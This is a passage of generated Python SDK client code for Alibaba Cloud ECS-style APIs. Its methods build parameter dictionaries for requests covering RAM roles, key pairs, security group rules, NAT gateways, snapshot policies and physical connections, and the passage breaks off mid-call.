instance_ids=None, ram_role_name=None, owner_id=None): api_request = APIRequest('DetachInstanceRamRole', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "RamRoleName": ram_role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_ram_role( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, page_size=None, ram_role_name=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeInstanceRamRole', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "PageSize": page_size, "RamRoleName": ram_role_name, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def attach_instance_ram_role( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, ram_role_name=None, owner_id=None): api_request = APIRequest('AttachInstanceRamRole', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "RamRoleName": ram_role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_snapshot_package( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeSnapshotPackage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def modify_security_group_rule( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, source_group_owner_id=None, source_group_owner_account=None, region_id=None, ipv6_source_cidr_ip=None, ipv6_dest_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, owner_id=None, priority=None, dest_cidr_ip=None, source_group_id=None): api_request = APIRequest('ModifySecurityGroupRule', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "SourceGroupOwnerId": source_group_owner_id, "SourceGroupOwnerAccount": source_group_owner_account, "RegionId": region_id, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "OwnerId": owner_id, "Priority": priority, "DestCidrIp": dest_cidr_ip, "SourceGroupId": source_group_id} return self._handle_request(api_request).result def describe_snapshot_monitor_data( self, resource_owner_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, end_time=None, start_time=None, owner_id=None): api_request = APIRequest('DescribeSnapshotMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "EndTime": end_time, "StartTime": start_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_renewal_price( self, resource_owner_id=None, resource_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, price_unit=None, owner_id=None, resource_type=None): api_request = APIRequest('DescribeRenewalPrice', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PriceUnit": price_unit, "OwnerId": owner_id, "ResourceType": resource_type} return self._handle_request(api_request).result def describe_price( self, data_disk3_performance_level=None, data_disk3_size=None, resource_owner_id=None, image_id=None, data_disk3_category=None, io_optimized=None, internet_max_bandwidth_out=None, system_disk_category=None, system_disk_performance_level=None, data_disk4_category=None, data_disk4_performance_level=None, region_id=None, data_disk4_size=None, price_unit=None, instance_type=None, data_disk2_category=None, data_disk1_size=None, period=None, amount=None, resource_owner_account=None, owner_account=None, data_disk2_size=None, data_disk1_performance_level=None, owner_id=None, resource_type=None, data_disk1_category=None, data_disk2_performance_level=None, system_disk_size=None, internet_charge_type=None, instance_network_type=None): api_request = APIRequest('DescribePrice', 'GET', 'http', 'RPC', 'query') api_request._params = { "DataDisk.3.PerformanceLevel": data_disk3_performance_level, "DataDisk.3.Size": data_disk3_size, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "DataDisk.3.Category": data_disk3_category, "IoOptimized": io_optimized, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "SystemDisk.Category": system_disk_category, "SystemDisk.PerformanceLevel": system_disk_performance_level, "DataDisk.4.Category": data_disk4_category, "DataDisk.4.PerformanceLevel": data_disk4_performance_level, "RegionId": region_id, "DataDisk.4.Size": data_disk4_size, "PriceUnit": price_unit, "InstanceType": instance_type, "DataDisk.2.Category": data_disk2_category, "DataDisk.1.Size": data_disk1_size, "Period": period, "Amount": amount, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DataDisk.2.Size": data_disk2_size, "DataDisk.1.PerformanceLevel": data_disk1_performance_level, "OwnerId": owner_id, "ResourceType": resource_type, "DataDisk.1.Category": data_disk1_category, "DataDisk.2.PerformanceLevel": data_disk2_performance_level, "SystemDisk.Size": system_disk_size, "InternetChargeType": internet_charge_type, "InstanceNetworkType": instance_network_type} return self._handle_request(api_request).result def modify_deployment_set_attribute( self, deployment_set_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, description=None, deployment_set_name=None, owner_id=None): api_request = APIRequest('ModifyDeploymentSetAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "DeploymentSetId": deployment_set_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "DeploymentSetName": deployment_set_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_deployment_sets( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, network_type=None, deployment_set_name=None, owner_id=None, page_number=None, deployment_set_ids=None, region_id=None, granularity=None, domain=None, page_size=None, strategy=None): api_request = APIRequest('DescribeDeploymentSets', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "NetworkType": network_type, "DeploymentSetName": deployment_set_name, "OwnerId": owner_id, "PageNumber": page_number, "DeploymentSetIds": deployment_set_ids, "RegionId": region_id, "Granularity": granularity, "Domain": domain, "PageSize": page_size, "Strategy": strategy} return self._handle_request(api_request).result def delete_deployment_set( self, deployment_set_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteDeploymentSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "DeploymentSetId": deployment_set_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_deployment_set( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, deployment_set_name=None, owner_id=None, region_id=None, on_unable_to_redeploy_failed_instance=None, granularity=None, domain=None, strategy=None): api_request = APIRequest('CreateDeploymentSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "DeploymentSetName": deployment_set_name, "OwnerId": owner_id, "RegionId": region_id, "OnUnableToRedeployFailedInstance": on_unable_to_redeploy_failed_instance, "Granularity": granularity, "Domain": domain, "Strategy": strategy} return self._handle_request(api_request).result def import_key_pair( self, resource_owner_id=None, resource_owner_account=None, region_id=None, public_key_body=None, key_pair_name=None, owner_id=None): api_request = APIRequest('ImportKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PublicKeyBody": public_key_body, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def detach_key_pair( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, key_pair_name=None, owner_id=None): api_request = APIRequest('DetachKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_key_pairs( self, resource_group_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, key_pair_finger_print=None, page_size=None, key_pair_name=None, list_of_tag=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeKeyPairs', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceGroupId": resource_group_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "KeyPairFingerPrint": key_pair_finger_print, "PageSize": page_size, "KeyPairName": key_pair_name, "Tag": list_of_tag, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_key_pairs( self, resource_owner_id=None, resource_owner_account=None, region_id=None, key_pair_names=None, owner_id=None): api_request = APIRequest('DeleteKeyPairs', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "KeyPairNames": key_pair_names, "OwnerId": owner_id} return self._handle_request(api_request).result def create_key_pair( self, resource_group_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, key_pair_name=None, list_of_tag=None, owner_id=None): api_request = APIRequest('CreateKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceGroupId": resource_group_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "KeyPairName": key_pair_name, "Tag": list_of_tag, "OwnerId": owner_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def attach_key_pair( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, key_pair_name=None, owner_id=None): api_request = APIRequest('AttachKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_instance_auto_renew_attribute( self, duration=None, resource_owner_id=None, period_unit=None, instance_id=None, auto_renew=None, resource_owner_account=None, region_id=None, owner_account=None, renewal_status=None, owner_id=None): api_request = APIRequest('ModifyInstanceAutoRenewAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "Duration": duration, "ResourceOwnerId": resource_owner_id, "PeriodUnit": period_unit, "InstanceId": instance_id, "AutoRenew": auto_renew, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RenewalStatus": renewal_status, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_auto_renew_attribute( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, renewal_status=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeInstanceAutoRenewAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RenewalStatus": renewal_status, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_snapshot_links( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, disk_ids=None, snapshot_link_ids=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeSnapshotLinks', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "DiskIds": disk_ids, "SnapshotLinkIds": snapshot_link_ids, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def modify_instance_auto_release_time( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, auto_release_time=None, owner_id=None): api_request = APIRequest('ModifyInstanceAutoReleaseTime', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AutoReleaseTime": auto_release_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_new_project_eip_monitor_data( self, resource_owner_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, end_time=None, allocation_id=None, start_time=None, owner_id=None): api_request = APIRequest('DescribeNewProjectEipMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "EndTime": end_time, "AllocationId": allocation_id, "StartTime": start_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_user_data( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_id=None): api_request = APIRequest('DescribeUserData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id} return self._handle_request(api_request).result def remove_bandwidth_package_ips( self, list_of_removed_ip_addresses=None, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, owner_id=None): api_request = APIRequest('RemoveBandwidthPackageIps', 'GET', 'http', 'RPC', 'query') api_request._params = { "RemovedIpAddresses": list_of_removed_ip_addresses, "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"RemovedIpAddresses": ('RemovedIpAddresses', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_forward_entry( self, resource_owner_id=None, resource_owner_account=None, ip_protocol=None, owner_account=None, forward_table_id=None, owner_id=None, internal_ip=None, region_id=None, forward_entry_id=None, internal_port=None, external_ip=None, external_port=None): api_request = APIRequest('ModifyForwardEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "OwnerId": owner_id, "InternalIp": internal_ip, "RegionId": region_id, "ForwardEntryId": forward_entry_id, "InternalPort": internal_port, "ExternalIp": external_ip, "ExternalPort": external_port} return self._handle_request(api_request).result def modify_bandwidth_package_spec( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, bandwidth=None, owner_account=None, owner_id=None): api_request = APIRequest('ModifyBandwidthPackageSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "Bandwidth": bandwidth, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_nat_gateways( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, vpc_id=None, page_size=None, nat_gateway_id=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeNatGateways', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "VpcId": vpc_id, "PageSize": page_size, "NatGatewayId": nat_gateway_id, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_forward_table_entries( self, resource_owner_id=None, resource_owner_account=None, region_id=None, forward_entry_id=None, owner_account=None, forward_table_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeForwardTableEntries', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ForwardEntryId": forward_entry_id, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def describe_bandwidth_packages( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, nat_gateway_id=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeBandwidthPackages', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "NatGatewayId": nat_gateway_id, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def delete_nat_gateway( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, nat_gateway_id=None, owner_id=None): api_request = APIRequest('DeleteNatGateway', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "NatGatewayId": nat_gateway_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_forward_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, forward_entry_id=None, owner_account=None, forward_table_id=None, owner_id=None): api_request = APIRequest('DeleteForwardEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ForwardEntryId": forward_entry_id, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "OwnerId": owner_id} return self._handle_request(api_request).result def delete_bandwidth_package( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteBandwidthPackage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_nat_gateway( self, resource_owner_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, vpc_id=None, name=None, description=None, owner_id=None, list_of_bandwidth_package=None): api_request = APIRequest('CreateNatGateway', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "VpcId": vpc_id, "Name": name, "Description": description, "OwnerId": owner_id, "BandwidthPackage": list_of_bandwidth_package} repeat_info = { "BandwidthPackage": ( 'BandwidthPackage', 'list', 'dict', [ ('Bandwidth', 'str', None, None), ('Zone', 'str', None, None), ('IpCount', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_forward_entry( self, resource_owner_id=None, resource_owner_account=None, region_id=None, ip_protocol=None, internal_port=None, owner_account=None, forward_table_id=None, owner_id=None, external_ip=None, external_port=None, internal_ip=None): api_request = APIRequest('CreateForwardEntry', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "IpProtocol": ip_protocol, "InternalPort": internal_port, "OwnerAccount": owner_account, "ForwardTableId": forward_table_id, "OwnerId": owner_id, "ExternalIp": external_ip, "ExternalPort": external_port, "InternalIp": internal_ip} return self._handle_request(api_request).result def add_bandwidth_package_ips( self, resource_owner_id=None, bandwidth_package_id=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, owner_id=None, ip_count=None): api_request = APIRequest('AddBandwidthPackageIps', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "BandwidthPackageId": bandwidth_package_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "OwnerId": owner_id, "IpCount": ip_count} return self._handle_request(api_request).result def eip_fill_product( self, resource_owner_id=None, data=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EipFillProduct', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "data": data, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def eip_notify_paid( self, resource_owner_id=None, data=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EipNotifyPaid', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "data": data, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def eip_fill_params( self, resource_owner_id=None, data=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EipFillParams', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "data": data, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_auto_snapshot_policy_ex( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, time_points=None, retention_days=None, owner_id=None, repeat_weekdays=None, auto_snapshot_policy_name=None): api_request = APIRequest('ModifyAutoSnapshotPolicyEx', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "autoSnapshotPolicyId": auto_snapshot_policy_id, "timePoints": time_points, "retentionDays": retention_days, "OwnerId": owner_id, "repeatWeekdays": repeat_weekdays, "autoSnapshotPolicyName": auto_snapshot_policy_name} return self._handle_request(api_request).result def describe_auto_snapshot_policy_ex( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeAutoSnapshotPolicyEx', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "AutoSnapshotPolicyId": auto_snapshot_policy_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def delete_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, owner_id=None): api_request = APIRequest('DeleteAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "autoSnapshotPolicyId": auto_snapshot_policy_id, "OwnerId": owner_id} return self._handle_request(api_request).result def create_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, time_points=None, retention_days=None, owner_id=None, repeat_weekdays=None, auto_snapshot_policy_name=None): api_request = APIRequest('CreateAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "timePoints": time_points, "retentionDays": retention_days, "OwnerId": owner_id, "repeatWeekdays": repeat_weekdays, "autoSnapshotPolicyName": auto_snapshot_policy_name} return self._handle_request(api_request).result def cancel_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, disk_ids=None, owner_id=None): api_request = APIRequest('CancelAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "diskIds": disk_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def apply_auto_snapshot_policy( self, resource_owner_id=None, resource_owner_account=None, region_id=None, auto_snapshot_policy_id=None, disk_ids=None, owner_id=None): api_request = APIRequest('ApplyAutoSnapshotPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "regionId": region_id, "autoSnapshotPolicyId": auto_snapshot_policy_id, "diskIds": disk_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_image_support_instance_types( self, action_type=None, list_of_filter_=None, resource_owner_id=None, image_id=None, resource_owner_account=None, region_id=None, owner_id=None): api_request = APIRequest('DescribeImageSupportInstanceTypes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ActionType": action_type, "Filter": list_of_filter_, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerId": owner_id} repeat_info = {"Filter": ('Filter', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def terminate_virtual_border_router( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, vbr_id=None, owner_id=None): api_request = APIRequest('TerminateVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "VbrId": vbr_id, "OwnerId": owner_id} return self._handle_request(api_request).result def terminate_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('TerminatePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def recover_virtual_border_router( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, owner_account=None, user_cidr=None, vbr_id=None, owner_id=None): api_request = APIRequest('RecoverVirtualBorderRouter', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "UserCidr": user_cidr, "VbrId": vbr_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_virtual_border_router_attribute( self, resource_owner_id=None, circuit_code=None, vlan_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, vbr_id=None, owner_id=None, peer_gateway_ip=None, peering_subnet_mask=None, region_id=None, name=None, local_gateway_ip=None, user_cidr=None): api_request = APIRequest('ModifyVirtualBorderRouterAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CircuitCode": circuit_code, "VlanId": vlan_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "VbrId": vbr_id, "OwnerId": owner_id, "PeerGatewayIp": peer_gateway_ip, "PeeringSubnetMask": peering_subnet_mask, "RegionId": region_id, "Name": name, "LocalGatewayIp": local_gateway_ip, "UserCidr": user_cidr} return self._handle_request(api_request).result def modify_physical_connection_attribute( self, redundant_physical_connection_id=None, peer_location=None, resource_owner_id=None, port_type=None, circuit_code=None, bandwidth=None, client_token=None, resource_owner_account=None, owner_account=None, description=None, owner_id=None, line_operator=None, region_id=None, physical_connection_id=None, name=None, user_cidr=None): api_request = APIRequest('ModifyPhysicalConnectionAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "RedundantPhysicalConnectionId": redundant_physical_connection_id, "PeerLocation": peer_location, "ResourceOwnerId": resource_owner_id, "PortType": port_type, "CircuitCode": circuit_code, "bandwidth": bandwidth, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Description": description, "OwnerId": owner_id, "LineOperator": line_operator, "RegionId": region_id, "PhysicalConnectionId": physical_connection_id, "Name": name, "UserCidr": user_cidr} return self._handle_request(api_request).result def enable_physical_connection( self, resource_owner_id=None, region_id=None, resource_owner_account=None, client_token=None, physical_connection_id=None, owner_account=None, user_cidr=None, owner_id=None): api_request = APIRequest('EnablePhysicalConnection', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "PhysicalConnectionId": physical_connection_id, "OwnerAccount": owner_account, "UserCidr": user_cidr, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_virtual_border_routers_for_physical_connection( self, list_of_filter_=None, resource_owner_id=None, resource_owner_account=None, region_id=None, physical_connection_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest( 